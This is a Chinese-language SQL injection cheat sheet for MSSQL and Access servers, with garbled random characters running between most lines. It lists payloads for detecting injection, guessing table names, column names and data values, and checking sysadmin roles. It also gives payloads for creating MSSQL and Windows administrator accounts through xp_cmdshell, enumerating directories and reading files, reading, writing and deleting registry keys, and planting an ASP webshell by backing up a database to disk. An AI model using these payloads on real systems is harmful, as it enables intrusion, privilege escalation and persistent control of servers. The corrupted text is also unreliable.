1.判断是否有注入;and 1=1 ;and 1=2 K�
N0S$nW+
2.初步判断是否是mssql ;and user>0 x�vp{F9~qT
#���Ju���O
3.注入参数是字符'and [查询条件] and ''=' {(7.��X4\x
q97Dn[�>3�
4.搜索时没过滤参数的'and [查询条件] and '%25'=' ��+#Ov�9b�
)_.@M �'?�
5.判断数据库系统 ��h{�<^�?=
|E�U}&��k2
;and (select count(*) from sysobjects)>0 mssql 0<v~�J9��i
)zUV6U7��v
;and (select count(*) from msysobjects)>0 access ^n]�tf9{I�
FAE>�N-brQ
{%S1x{U}W-
_E'�M(�.B<
6.猜数据库 ;and (select Count(*) from [数据库名])>0 �u�LhamE)�
Q1&: +7�%
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 pB�L{��DgX
$!obpZ~��}
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 92
Pp.�Rh�
"5�dh]-m n
9.(1)猜字段的ascii值(access) %iD>^���Dp
*A,=���Y�/
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 [(btp�Wxb^
kmov(��V��
(2)猜字段的ascii值(mssql) G0]q(.�sOy
�8%
1h�fj
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 ��~�01�r�c
~ �xf�9
ml
10.测试权限结构(mssql) HNU[W�8mg8
c}v:X
Slh7
S�8"X�7\d{
b55|JWfC`�
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- �6�Mk@�,\1
�w0*�6GCP�
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- �8 ��(�.�<
#C>pA<YJzK
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- 1�u�XtBk6
TF=S \
�Q
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- 2N�)�Ywqvj
S��$JM0�1�
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- sL&u%7>Re�
�8<.���KWr
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- �#�v(+3Hp
_�|tg#i|Om
;and 1=(select IS_MEMBER('db_owner'));-- '�{:(��4>&
`/+7@~[R�U
j*xe�ns$)
4,<~��t>M1
11.添加mssql和系统的帐户 ^@[[,1"��K
2E�K\QW�o
;exec master.dbo.sp_addlogin username;-- ^x/0*t5};z
;exec master.dbo.sp_password null,username,password;-- 8~2A"<�{ub
Y
�=�`��3L
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- Z6h.gaQ7
H
�Vx0V6{JX
;exec master.dbo.xp_cmdshell 'net user username password P"i���qP|�
y/i"o-}}~|
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- 2_F`ILCM�L
t 8M3V�G�N
;exec master.dbo.xp_cmdshell 'net user username password /add';--
W�8"�:lpp
�7d4R�td�I
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- orHVL�2
KK
�UNY>�Q�7�
�;[9cj&7C<
�Y$�Uv�t_�
12.(1)遍历目录 },f7I�^s|
>T!n�* -Zn
;create table dirs(paths varchar(100), id int) ��-�OkKLub
s�}?98?tYB
;insert dirs exec master.dbo.xp_dirtree 'c:\' slQKkx \Dn
�Kw�?,A
��
;and (select top 1 paths from dirs)>0 W%h�<@@c4,
E-�"Jgq\aC
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) MESQ�Asx�%
}W|�C�IgF*
w[�|!$J�?�
1m��![;Pg3
(2)遍历目录 �'�GW�@��P
�#x����%O0
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- �{�UPIdQ'g
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 HQU�L�?URt
41�C=O@9�m
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 ?xG #4P<C=
Od�������R
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 �MPGQ4v�i&
7�r�r5$,Mv
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 (sl]%RjGa�
�A!^,QRkRN
YInW)My�.h
H��[G EAQO
13.mssql中的存储过程 j`t�Ux#
�h
e�m ��W#ZX
xp_regenumvalues 注册表根键, 子键 5VP�uH��Y2
}5�S2�v+zE
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 �tr'95'5W.
dm� ��2_Fj
xp_regread 根键,子键,键值名 $�jn�tT(V
��{Rz`)qqE
;exec xp_regread Z�'�f�y�9
z��f S<X�
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 eVlI:yqppj
#Gg�^f���m
xp_regwrite 根键,子键, 值名, 值类型, 值 'x�18F#g�
X F40�;urm
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 `kz_��q�/K
H�m�iwpI��
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 ��:��c.i Z
�k&?�Q�eXW
xp_regdeletevalue 根键,子键,值名 y�T,�UM�^'
�N�C��s�UC
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 r%a$u%)o�D
r8>�
q*0~s
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 �; �6z�u�!
J{���1O�\i
{6AJ>}���3
+�?L~fM69B
14.mssql的backup创建webshell K:{Q�~+
��
]pGr'T~Gj
use model n/�8fv~�zU
AKWw�36�lm
create table cmd(str image); �h�Q\]vp7V
u*U?VZ���5
insert into cmd(str) values (''); Y{�S/A�*�X
��);*GOLka
backup database model to disk='c:\l.asp'; D0-e,)G}V,
I�Q~()/;3d
�>/n/�n{{�
w�5|"cD#8A
15.mssql内置函数 �I�q52rI�}
��lWd�E�^-
;and (select @@version)>0 获得Windows的版本号 �t�DwXb�>�
'-�~86Q���
;and user_name()='dbo' 判断当前系统的连接用户是不是sa +pV3�.VMH0
nDo|^{!L`
;and (select user_name())>0 爆当前系统的连接用户 <�0vvlOL5�
4 IHl'*D[#
;and (select db_name())>0 得到当前连接的数据库 Z*Y?"1ar�
5eU/� �[F9
'�nL�v0.7*
Ga�h� e-%J
16.简洁的webshell j��BQQ�?cA
E }y��xF�.
use model q\/|n�ZO4�
9Q�Y��U�
J
create table cmd(str image); $� OR>JnV
L��R�I_s>7
insert into cmd(str) values (''); �uu/M�X�ID
B�\mdOTL�Q
backup database model to disk='g:\wwwtest\l.asp';
